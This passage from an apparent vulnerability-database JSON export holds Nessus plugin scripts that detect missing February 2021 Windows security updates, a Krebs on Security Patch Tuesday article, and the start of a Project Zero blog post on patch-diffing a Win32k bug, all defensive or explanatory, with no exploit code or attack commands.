script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:16", 
"description": "The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24078, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. 
(CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601345.NASL", "href": "https://www.tenable.com/plugins/nessus/146337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146337);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601345\");\n script_xref(name:\"MSFT\", value:\"MS21-4601345\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601345: Windows 10 Version 1809 and Windows Server 2019 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601345.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24078,\n CVE-2021-24081, CVE-2021-24083, CVE-2021-24088,\n CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/office/february-9-2021%e2%80%94kb4601345-os-build-17763-1757-c38b7b85-0d84-d979-1a29-e4ba97b82042?ui=en-US&rs=en-US&ad=US\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0231130\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601345.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601345');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601345])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n 
audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:03:17", "description": "The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24075, CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24096, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. 
(CVE-2021-1731, CVE-2021-24082)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601319: Windows 10 version 2004 Feb 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601319.NASL", "href": "https://www.tenable.com/plugins/nessus/146345", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146345);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24075\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24096\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601319\");\n script_xref(name:\"MSFT\", value:\"MS21-4601319\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601319: Windows 10 version 2004 Feb 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601319.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. 
(CVE-2021-24075,\n CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24096, CVE-2021-24102, CVE-2021-24103,\n CVE-2021-25195)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4601319\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4601319 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list(\n '4601319'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n|| \nsmb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601319])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 
hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-02-10T00:29:38", "description": "**Microsoft** today rolled out updates to plug at least 56 security holes in its **Windows** operating systems and other software. One of the bugs is already being actively exploited, and six of them were publicized prior to today, potentially giving attackers a head start in figuring out how to exploit the flaws.\n\n\n\nNine of the 56 vulnerabilities earned Microsoft's most urgent "critical" rating, meaning malware or miscreants could use them to seize remote control over unpatched systems with little or no help from users.\n\nThe flaw being exploited in the wild already -- [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) -- affects Windows 10, Server 2016 and later editions. It received a slightly less dire "important" rating and mainly because it is a vulnerability that lets an attacker increase their authority and control on a device, which means the attacker needs to already have access to the target system.\n\nTwo of the other bugs that were disclosed prior to this week are critical and reside in **Microsoft's .NET Framework**, a component required by many third-party applications (most Windows users will have some version of .NET installed).\n\nWindows 10 users should note that while the operating system installs all monthly patch roll-ups in one go, that rollup does not typically include .NET updates, which are installed on their own. So when you've backed up your system and installed this month's patches, you may want to check Windows Update again to see if there are any .NET updates pending.\n\nA key concern for enterprises is another critical bug in the DNS server on Windows Server 2008 through 2019 versions that could be used to remotely install software of the attacker's choice. 
[CVE-2021-24078](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24078>) earned [a CVSS Score](<https://nvd.nist.gov/vuln-metrics/cvss>) of 9.8, which is about as dangerous as they come.\n\n**Recorded Future** says this vulnerability can be exploited remotely by getting a vulnerable DNS server to query for a domain it has not seen before (e.g. by sending a phishing email with a link to a new domain or even with images embedded that call out to a new domain). **Kevin Breen** of **Immersive Labs** notes that CVE-2021-24078 could let an attacker steal loads of data by altering the destination for an organization's web traffic -- such as pointing internal appliances or Outlook email access at a malicious server.\n\nWindows Server users also should be aware that Microsoft this month is enforcing the second round of security improvements as part of a two-phase update to address [CVE-2020-1472](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>), a severe vulnerability that [first saw active exploitation back in September 2020](<https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/>).\n\nThe vulnerability, dubbed "**Zerologon**," is a bug in the core "**Netlogon**" component of Windows Server devices. The flaw lets an unauthenticated attacker gain administrative access to a Windows domain controller and run any application at will. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\nMicrosoft's [initial patch for CVE-2020-1472](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>) fixed the flaw on Windows Server systems, but did nothing to stop unsupported or third-party devices from talking to domain controllers using the insecure Netlogon communications method. 
Microsoft said it chose this two-step approach "to ensure vendors of non-compliant implementations can provide customers with updates." With this month's patches, Microsoft will begin rejecting insecure Netlogon attempts from non-Windows devices.\n\nA couple of other, non-Windows security updates are worth mentioning. Adobe today [released updates to fix at least 50 security holes in a range of products](<https://blogs.adobe.com/psirt/?p=1965>), including Photoshop and Reader. The Acrobat/Reader update tackles a critical zero-day flaw that [Adobe says](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) is actively being exploited in the wild against Windows users, so if you have Adobe Acrobat or Reader installed, please make sure these programs are kept up to date.\n\nThere is also a zero-day flaw in **Google's Chrome Web browser** (CVE-2021-21148) that is seeing active attacks. Chrome downloads security updates automatically, but users still need to restart the browser for the updates to fully take effect. If you're a Chrome user and notice a red "update" prompt to the right of the address bar, it's time to save your work and restart the browser.\n\nStandard reminder: While staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re less likely to pull your hair out when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nKeep in mind that Windows 10 by default will automatically download and install updates on its own schedule. 
If you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAnd as always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-09T22:37:19", "type": "krebs", "title": "Microsoft Patch Tuesday, February 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1732", "CVE-2021-21148", "CVE-2021-24078"], "modified": "2021-02-09T22:37:19", "id": "KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "href": "https://krebsonsecurity.com/2021/02/microsoft-patch-tuesday-february-2021-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": 
[{"lastseen": "2021-07-30T19:23:15", "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). \n\n** \n**\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\n** \n**\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. 
If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\n** \n**\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\n** \n**\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). 
With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\n** \n**\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows 